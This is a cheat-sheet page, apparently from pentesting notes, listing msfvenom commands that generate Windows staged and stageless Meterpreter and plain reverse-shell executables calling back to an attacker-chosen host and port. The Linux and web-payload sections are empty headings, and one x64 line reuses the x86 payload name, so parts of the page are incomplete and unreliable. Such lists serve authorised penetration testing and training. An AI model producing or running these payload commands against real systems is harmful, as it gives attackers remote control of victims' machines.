MSFVenom

Here are some of the popular payloads created using msfvenom,

Windows

Staged Meterpreter

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Stageless Meterpreter

msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Staged Non-meterpreter

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Stageless Non-meterpreter

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Linux

Staged Meterpreter

Stageless Meterpreter

Staged Non-Meterpreter

Stageless Non-Meterpreter

Web Payloads

Meterpreter

The output format for each line are asp, jsp, war and php.

Non-Meterpreter

The output format for each line are asp, jsp, war and php.

If the file is hta, then based on the operating system you may have to create a x64 or x86 file for reverse shell.

Other Resources

https://github.com/ksanchezcld/Hacking_Cheat_Sheet/blob/master/msfvenom

Last updated

Was this helpful?